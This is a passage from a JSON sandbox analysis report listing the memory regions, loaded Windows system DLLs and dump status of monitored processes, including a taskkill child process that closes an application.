"\\Windows\\SysWOW64\\sspicli.dll", "id": "region_3567", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:28.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_3568", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:28.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_3569", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:28.477", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_3570", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:28.477", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_3571", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:28.478", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_3572", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:28.478", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_3573", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:28.479", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_3574", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:28.479", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_3575", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:28.480", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_3576", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:28.480", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_3577", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:28.481", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_3578", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:28.481", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_3579", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:28.482", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_3580", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:28.482", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_3581", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:28.483", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_3582", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:28.483", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_3583", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:28.484", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3584", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:28.484", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 4227071, "entry_point": 0, "filename": null, "id": "region_3585", "name": "pagefile_0x0000000000280000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2621440, "timestamp": "00:01:28.491", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_3586", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:28.491", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_3587", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:28.492", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_3588", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:28.589", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_3589", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:28.589", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 540671, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_3590", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:28.589", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_3591", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:01:28.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1380351, "entry_point": 0, "filename": null, "id": "region_3592", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:01:28.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 2228223, "entry_point": 1441792, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_3593", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 1441792, "timestamp": "00:01:28.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, "filename": null, "id": "region_3594", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:01:28.591", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4521983, "entry_point": 0, "filename": null, "id": "region_3595", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:01:28.591", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 6623231, "entry_point": 0, "filename": null, "id": "region_3596", "name": "pagefile_0x00000000004d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5046272, "timestamp": "00:01:28.591", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7995392, "type": "region", "version": 1 }, "end_va": 8257535, "entry_point": 0, "filename": null, "id": "region_3597", "name": "private_0x00000000007a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7995392, "timestamp": "00:01:28.591", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9764864, "type": "region", "version": 1 }, "end_va": 10027007, "entry_point": 0, "filename": null, "id": "region_3598", "name": "private_0x0000000000950000", "norm_filename": null, "region_type": "private_memory", "start_va": 9764864, "timestamp": "00:01:28.591", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 16842752, "type": "region", "version": 1 }, "end_va": 37814271, "entry_point": 0, "filename": null, "id": "region_3599", "name": "pagefile_0x0000000001010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 16842752, "timestamp": "00:01:28.591", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_3600", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:28.591", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_3601", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:28.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2297855, "entry_point": 0, "filename": null, "id": "region_3602", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": "00:01:28.596", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1786970112, "type": "region", "version": 1 }, "end_va": 1787346943, "entry_point": 1787112264, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_3603", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1786970112, "timestamp": "00:01:28.596", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1787363328, "type": "region", "version": 1 }, "end_va": 1787404287, "entry_point": 1787368602, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_3604", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1787363328, "timestamp": "00:01:28.597", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 8257536, "type": "region", "version": 1 }, "end_va": 9306111, "entry_point": 0, "filename": null, "id": "region_3605", "name": "private_0x00000000007e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8257536, "timestamp": "00:01:28.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 12058624, "type": "region", "version": 1 }, "end_va": 12320767, "entry_point": 0, "filename": null, "id": "region_3606", "name": "private_0x0000000000b80000", "norm_filename": null, "region_type": "private_memory", "start_va": 12058624, "timestamp": "00:01:28.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1786773504, "type": "region", "version": 1 }, "end_va": 1786941439, "entry_point": 1786800921, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_3607", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1786773504, "timestamp": "00:01:28.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9502720, "type": "region", "version": 1 }, "end_va": 9764863, "entry_point": 0, "filename": null, "id": "region_3608", "name": "private_0x0000000000910000", "norm_filename": null, "region_type": "private_memory", "start_va": 9502720, "timestamp": "00:01:28.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 11206656, "type": "region", "version": 1 }, "end_va": 11468799, "entry_point": 0, "filename": null, "id": "region_3609", "name": "private_0x0000000000ab0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11206656, "timestamp": "00:01:28.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 12320768, "type": "region", "version": 1 }, "end_va": 15265791, "entry_point": 12320768, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_3610", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 12320768, "timestamp": "00:01:28.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_3611", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:28.613", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_3612", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:28.613", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_3613", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:28.613", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_3614", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:28.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 10289152, "type": "region", "version": 1 }, "end_va": 10551295, "entry_point": 0, "filename": null, "id": "region_3615", "name": "private_0x00000000009d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10289152, "timestamp": "00:01:28.673", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 10747904, "type": "region", "version": 1 }, "end_va": 11010047, "entry_point": 0, "filename": null, "id": "region_3616", "name": "private_0x0000000000a40000", "norm_filename": null, "region_type": "private_memory", "start_va": 10747904, "timestamp": "00:01:28.673", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 11730944, "type": "region", "version": 1 }, "end_va": 11993087, "entry_point": 0, "filename": null, "id": "region_3617", "name": "private_0x0000000000b30000", "norm_filename": null, "region_type": "private_memory", "start_va": 11730944, "timestamp": "00:01:28.673", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 16056320, "type": "region", "version": 1 }, "end_va": 16318463, "entry_point": 0, "filename": null, "id": "region_3618", "name": "private_0x0000000000f50000", "norm_filename": null, "region_type": "private_memory", "start_va": 16056320, "timestamp": "00:01:28.673", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1786707968, "type": "region", "version": 1 }, "end_va": 1786769407, "entry_point": 1786716576, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_3619", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1786707968, "timestamp": "00:01:28.673", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_3620", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:28.674", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_3621", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:28.674", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1783103488, "type": "region", "version": 1 }, "end_va": 1783717887, "entry_point": 1783232697, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_3622", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1783103488, "timestamp": "00:01:28.681", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1786576896, "type": "region", "version": 1 }, "end_va": 1786675199, "entry_point": 1786581813, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_3623", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1786576896, "timestamp": "00:01:28.681", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM oktell.HALMixerApp.exe /IM oktell.HALMixerApp.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_29", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 29, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3624", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:29.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_3625", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:29.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_3626", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": 